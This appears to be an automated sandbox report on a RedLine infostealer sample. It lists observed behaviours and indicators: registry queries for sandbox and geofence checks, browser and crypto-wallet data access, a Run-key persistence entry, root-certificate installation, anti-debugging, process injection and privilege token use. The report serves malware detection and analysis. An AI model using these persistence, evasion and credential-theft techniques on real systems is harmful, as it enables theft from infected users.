redline | 62be0ca52ea9ebc4c577d597b919f6b90cebdcc2179d7d482a04bf5731eec720

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8709834.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4691549.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4691549.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8709834.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Control Panel\International\Geo\Nation	Sun038db98f99bf9a.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Control Panel\International\Geo\Nation	Sun038aa349e3318e.exe

Loads dropped DLL 64 IoCs

pid	Process
1692	setup_x86_x64_install.exe
2028	setup_installer.exe
2028	setup_installer.exe
2028	setup_installer.exe
2028	setup_installer.exe
2028	setup_installer.exe
2028	setup_installer.exe
680	setup_install.exe
680	setup_install.exe
680	setup_install.exe
680	setup_install.exe
680	setup_install.exe
680	setup_install.exe
680	setup_install.exe
680	setup_install.exe
1852	cmd.exe
1832	cmd.exe
1832	cmd.exe
1920	cmd.exe
1920	cmd.exe
1100	cmd.exe
1100	cmd.exe
1800	cmd.exe
1228	cmd.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
568	Sun0324aba28588c0.exe
568	Sun0324aba28588c0.exe
1096	Sun033e271e0ce96c08.exe
1096	Sun033e271e0ce96c08.exe
1088	Sun0397381f1f458e.exe
1088	Sun0397381f1f458e.exe
1736	cmd.exe
712	cmd.exe
112	cmd.exe
712	cmd.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
112	cmd.exe
1088	Sun0397381f1f458e.exe
1036	Sun03e4aeb7e43a1c.exe
1036	Sun03e4aeb7e43a1c.exe
1840	cmd.exe
1340	cmd.exe
1184	Sun03f0dc4460bc9.exe
1184	Sun03f0dc4460bc9.exe
2032	cmd.exe
1868	Sun03f5d51697d04.exe
1868	Sun03f5d51697d04.exe
1472	Sun0397381f1f458e.exe
1472	Sun0397381f1f458e.exe
856	Sun03d477f1a31.exe
856	Sun03d477f1a31.exe
1868	Sun03f5d51697d04.exe
1300	Sun03f5d51697d04.tmp
1300	Sun03f5d51697d04.tmp
1300	Sun03f5d51697d04.tmp
1300	Sun03f5d51697d04.tmp
524	Sun03f5d51697d04.exe
524	Sun03f5d51697d04.exe
524	Sun03f5d51697d04.exe
1248	Sun03f5d51697d04.tmp
1248	Sun03f5d51697d04.tmp
1248	Sun03f5d51697d04.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	6391113.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	8709834.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	4691549.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
58	ip-api.com
39	ipinfo.io
40	ipinfo.io
53	ipinfo.io

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2720	4691549.exe
2220	8709834.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1184 set thread context of 2144	1184	Sun03f0dc4460bc9.exe	65
PID 3484 set thread context of 3492	3484	conhost.exe	146

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	Sun03f5d51697d04.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	Sun03f5d51697d04.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\is-S41G9.tmp	Sun03f5d51697d04.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 7 IoCs

pid	pid_target	Process	procid_target
552	1728	WerFault.exe	59
2856	288	WerFault.exe	45
2256	1036	WerFault.exe	48
2480	2632	WerFault.exe	87
2384	1076	WerFault.exe	86
3784	2904	WerFault.exe	101
396	2428	WerFault.exe	142

Checks SCSI registry key(s) 3 TTPs 42 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun0324aba28588c0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun0324aba28588c0.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun0324aba28588c0.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
3980	schtasks.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
2624	taskkill.exe
2660	taskkill.exe
932	taskkill.exe
1836	taskkill.exe
1548	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 7 IoCs

adware spyware

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Factor = "20"	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Cache = a403000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\International\CpMRU	mshta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Enable = "1"	mshta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Size = "10"	mshta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\International\CpMRU\InitHits = "100"	mshta.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	Sun03d477f1a31.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	Sun03d477f1a31.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Chrome5.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Chrome5.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Chrome5.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Chrome5.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1072	powershell.exe
1300	powershell.exe
568	Sun0324aba28588c0.exe
568	Sun0324aba28588c0.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1284	Process not Found
2552	BnbpIxC5RaMUqdV08_JMLpxz.exe
2552	BnbpIxC5RaMUqdV08_JMLpxz.exe
1284	Process not Found
2552	BnbpIxC5RaMUqdV08_JMLpxz.exe
1284	Process not Found
2552	BnbpIxC5RaMUqdV08_JMLpxz.exe
1284	Process not Found

Suspicious behavior: GetForegroundWindowSpam 9 IoCs

pid	Process
1284	Process not Found
552	WerFault.exe
2856	WerFault.exe
2256	WerFault.exe
2480	WerFault.exe
2384	WerFault.exe
3784	WerFault.exe
396	WerFault.exe
3300	Sun039750b00c.exe

Suspicious behavior: MapViewOfSection 14 IoCs

pid	Process
568	Sun0324aba28588c0.exe
1340	rubjrie
2576	rubjrie
2324	rubjrie
2136	rubjrie
3220	rubjrie
3676	rubjrie
3884	rubjrie
3760	rubjrie
1132	rubjrie
1076	rubjrie
2856	rubjrie
2688	rubjrie
4000	rubjrie

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1300	powershell.exe
Token: SeDebugPrivilege	1072	powershell.exe
Token: SeCreateTokenPrivilege	856	Sun03d477f1a31.exe
Token: SeAssignPrimaryTokenPrivilege	856	Sun03d477f1a31.exe
Token: SeLockMemoryPrivilege	856	Sun03d477f1a31.exe
Token: SeIncreaseQuotaPrivilege	856	Sun03d477f1a31.exe
Token: SeMachineAccountPrivilege	856	Sun03d477f1a31.exe
Token: SeTcbPrivilege	856	Sun03d477f1a31.exe
Token: SeSecurityPrivilege	856	Sun03d477f1a31.exe
Token: SeTakeOwnershipPrivilege	856	Sun03d477f1a31.exe
Token: SeLoadDriverPrivilege	856	Sun03d477f1a31.exe
Token: SeSystemProfilePrivilege	856	Sun03d477f1a31.exe
Token: SeSystemtimePrivilege	856	Sun03d477f1a31.exe
Token: SeProfSingleProcessPrivilege	856	Sun03d477f1a31.exe
Token: SeIncBasePriorityPrivilege	856	Sun03d477f1a31.exe
Token: SeCreatePagefilePrivilege	856	Sun03d477f1a31.exe
Token: SeCreatePermanentPrivilege	856	Sun03d477f1a31.exe
Token: SeBackupPrivilege	856	Sun03d477f1a31.exe
Token: SeRestorePrivilege	856	Sun03d477f1a31.exe
Token: SeShutdownPrivilege	856	Sun03d477f1a31.exe
Token: SeDebugPrivilege	856	Sun03d477f1a31.exe
Token: SeAuditPrivilege	856	Sun03d477f1a31.exe
Token: SeSystemEnvironmentPrivilege	856	Sun03d477f1a31.exe
Token: SeChangeNotifyPrivilege	856	Sun03d477f1a31.exe
Token: SeRemoteShutdownPrivilege	856	Sun03d477f1a31.exe
Token: SeUndockPrivilege	856	Sun03d477f1a31.exe
Token: SeSyncAgentPrivilege	856	Sun03d477f1a31.exe
Token: SeEnableDelegationPrivilege	856	Sun03d477f1a31.exe
Token: SeManageVolumePrivilege	856	Sun03d477f1a31.exe
Token: SeImpersonatePrivilege	856	Sun03d477f1a31.exe
Token: SeCreateGlobalPrivilege	856	Sun03d477f1a31.exe
Token: 31	856	Sun03d477f1a31.exe
Token: 32	856	Sun03d477f1a31.exe
Token: 33	856	Sun03d477f1a31.exe
Token: 34	856	Sun03d477f1a31.exe
Token: 35	856	Sun03d477f1a31.exe
Token: SeDebugPrivilege	1584	Sun03ea09aa5c9686e5.exe
Token: SeDebugPrivilege	268	Sun0328255c4bce6fb.exe
Token: SeDebugPrivilege	2624	taskkill.exe
Token: SeDebugPrivilege	2660	taskkill.exe
Token: SeDebugPrivilege	552	WerFault.exe
Token: SeDebugPrivilege	2856	WerFault.exe
Token: SeShutdownPrivilege	1284	Process not Found
Token: SeShutdownPrivilege	1284	Process not Found
Token: SeDebugPrivilege	2256	WerFault.exe
Token: SeDebugPrivilege	692	DownFlSetup110.exe
